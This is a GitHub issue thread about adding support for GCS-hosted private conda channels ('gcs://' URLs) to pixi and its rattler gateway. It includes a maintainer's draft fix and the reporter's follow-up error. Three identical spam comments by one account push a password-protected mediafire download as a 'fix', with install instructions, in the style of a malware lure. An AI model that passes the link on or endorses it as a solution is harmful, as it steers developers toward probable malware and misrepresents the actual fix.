### ISSUE TITLE
Support for GCS private conda registry.

### ISSUE THREAD

**Issue by clement-chaneching** [prefix-dev/pixi#1922]
### Problem description

Hello,

I would like Pixi to support private conda registry hosted on GCS buckets.
I had actually pushed a [PR](https://github.com/conda/rattler/pull/605) to rattler a few months ago to have this GCS Middleware support.

I used to test with something [like this](https://github.com/clement-chaneching/pixi/pull/1/files) but never merged it.

Because of some changes to the `rattler_repodata_gateway/gateway` crate, I now have:
```
ERROR resolve_conda{group=default platform=linux-64}:get_or_create_subdir{channel=Channel { platforms: None, base_url: Url { scheme: "gcs", cannot_be_a_base: false, username: "", password: None, host: Some(Domain("blunomy-conda-registry")), port: None, path: "/", query: None, fragment: None }, name: None } platform=Linux64}: rattler_repodata_gateway::gateway: error='gcs' is not a supported scheme
  × 'gcs' is not a supported scheme
```

And I m not sure how to make it work anymore.
Could you have a look and try to support :

```
[tool.pixi.project]
channels = ["conda-forge", "gcs://<private-registry>"]
platforms = ["linux-64"]

[tool.pixi.dependencies]
package= { version = "==1.0.0", channel = "gcs://<private-registry>"}
```

Thanks for your help!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tdejager** [comment]
I think this makes sense, we should do the changes in the gateway I think. Is it normat to use the `gcs://` url scheme for this :)?

**Comment by olivier-lacroix** [comment]
We can now use rattler-build in conda-forge https://prefix.dev/blog/rattler_build_on_conda_forge

that recipe format is a bit more sane, so maybe we want to use that instead? note there is an automatic conversion tool available

**Comment by baszalmstra** [comment]
We will have to add this to the gateway indeed! Ill try to take a look at that this week!

**Comment by baszalmstra** [comment]
Docker support is not yet completely finalized in the conda ecosystem. There is an active [Conda Enhancement Proposal](https://github.com/conda/ceps/pull/70) that covers this use case. We might want to wait until that has been finalized.

**Comment by wolfv** [comment]
We do have or had support for the `oci://` scheme though. It's even documented :)

**Comment by baszalmstra** [comment]
I read this completely wrong, I was under the impression that you wanted to use the docker registry API. 

I drafted a fix in https://github.com/conda/rattler/pull/845 that hopefully works for your case.

**Comment by clement-chaneching** [comment]
Hello @baszalmstra 

This issue should be reopened because it doesnt work as expected:
![Image](https://github.com/user-attachments/assets/a139d63f-a90d-4a5c-aa58-b557fc1d3a88)

So now the "gcs" scheme is supported (not getting `  × 'gcs' is not a supported scheme` anymore, but i m getting `URL scheme not supported`.

The gcs URL should be converted later in the [gcs_middleware.rs]( https://github.com/conda/rattler/blob/main/crates/rattler_networking/src/gcs_middleware.rs)  to https://storage.googleapis.com to handle the auth.
Could you check that?
